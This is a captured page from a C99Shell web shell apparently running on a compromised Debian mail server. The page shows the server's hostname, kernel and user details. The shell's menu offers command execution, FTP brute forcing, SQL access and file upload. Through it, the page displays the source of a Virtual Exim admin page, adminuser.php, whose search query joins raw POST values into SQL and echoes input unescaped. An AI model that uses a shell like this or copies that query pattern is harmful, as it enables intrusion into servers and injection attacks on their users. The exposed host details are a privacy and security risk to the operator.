!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/vexim/   drwxr-xr-x
Free 130.06 GB of 142.11 GB (91.52%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     adminuser.php (4.29 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
  
include_once dirname(__FILE__) . '/config/variables.php';
  include_once 
dirname(__FILE__) . '/config/authpostmaster.php';
  include_once 
dirname(__FILE__) . '/config/functions.php';
  include_once 
dirname(__FILE__) . '/config/httpheaders.php';

  if (isset(
$_GET['LETTER'])) {
    
$letter strtolower($_GET['LETTER']);
  } else {
    
$letter '';
  }
  if (!isset(
$_POST['searchfor'])) {
    
$_POST['searchfor'] = '';
  }
  if (!isset(
$_POST['field']) || ($_POST['field'] != 'localpart')) {
    
$_POST['field'] = 'realname';
  }
?>
<html>
  <head>
    <title><?php echo _('Virtual Exim') . ': ' _('Manage Users'); ?></title>
    <link rel="stylesheet" href="style.css" type="text/css">
  </head>
  <body>
    <?php include dirname(__FILE__) . '/config/header.php'?>
    <div id="Menu">
      <a href="adminuseradd.php"><?php echo _('Add User'); ?></a>
      <?php
        $query 
"SELECT count(users.user_id)
          AS used, max_accounts
          FROM domains,users
          WHERE users.domain_id=
{$_SESSION['domain_id']}
          AND domains.domain_id=users.domain_id
          AND (users.type='local' OR users.type='piped')
          GROUP BY max_accounts"

        
$result $db->query($query);
        
$row $result->fetchRow();
        if ((
$result->numRows()) && $row['max_accounts']) {
          print 
"({$row['used']} of {$row['max_accounts']})";
        }
      
?>
      <br>
      <a href="admin.php"><?php echo _('Main Menu'); ?></a><br>
      <br><a href="logout.php"><?php echo _('Logout'); ?></a><br>
    </div>
    <div id="Content">
      <?php
        alpha_menu
($alphausers)
      
?>
      <form name="search" method="post" action="adminuser.php">
        <?php echo _('Search'); ?>:
        <input type="text" size="20" name="searchfor"
          value="<?php echo $_POST['searchfor']; ?>" class="textfield">
        <?php echo _('in'); ?>
        <select name="field" class="textfield">
          <option value="realname" <?php if ($_POST['field'] == 'realname') {
            echo 
'selected="selected"';
          } 
?>><?php echo _('User'); ?></option>
          <option value="localpart" <?php if ($_POST['field'] == 'localpart') {
            echo 
"selected=\"selected\"";
          } 
?>><?php echo _('Email address'); ?></option>
        </select>
        <input type="submit" name="search" value="<?php echo _('search'); ?>">
      </form>
      <table>
        <tr>
          <th>&nbsp;</th>
          <th><?php echo _('User'); ?></th>
          <th><?php echo _('Email address'); ?></th>
          <th><?php echo _('Admin'); ?></th>
        </tr>
        <?php
        $query 
"SELECT user_id, localpart, realname, admin, enabled 
          FROM users
          WHERE domain_id = '
{$_SESSION['domain_id']}
          AND  (type = 'local' OR type= 'piped')"
;
        if (
$alphausers AND $letter != '') {
          
$query .= " AND lower(localpart) LIKE lower('{$letter}%')";
        } elseif (
$_POST['searchfor'] != '') {
          
$query .= ' AND '
            
$_POST['field']
            .  
' LIKE "%'
            
$_POST['searchfor']
            . 
'%"';
        }
        
$query .= ' ORDER BY realname';
        
$result $db->query($query);
        while (
$row $result->fetchRow()) {
          print 
'<tr>';
          print 
'<td class="trash"><a href="adminuserdelete.php?user_id='
            
$row['user_id']
            . 
'&localpart='
            
$row['localpart']
            . 
'">';
          print 
'<img class="trash" title="Delete '
            
$row['realname']
            . 
'" src="images/trashcan.gif" alt="trashcan"></a></td>';
          print 
'<td><a href="adminuserchange.php?user_id=' $row['user_id']
            . 
'&localpart=' $row['localpart']
            . 
'" title="' _('Click to modify')
            . 
$row['realname']
            . 
'">'
            
$row['realname']
            . 
'</a></td>';
          print 
'<td>' $row['localpart'] .'@'$_SESSION['domain'] . '</td>';
          print 
'<td class="check">';
          if (
$row['admin'] == 1) {
            print  
'<img class="check" src="images/check.gif" title="'
            
$row['realname']
            . 
_(' is an administrator')
            . 
'">';
          }
          print 
"</td></tr>\n";
        }
        
?>
      </table>
    </div>
  </body>
</html>
<!-- Layout and CSS tricks obtained from http://www.bluerobot.com/web/layouts/ -->

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0149 ]--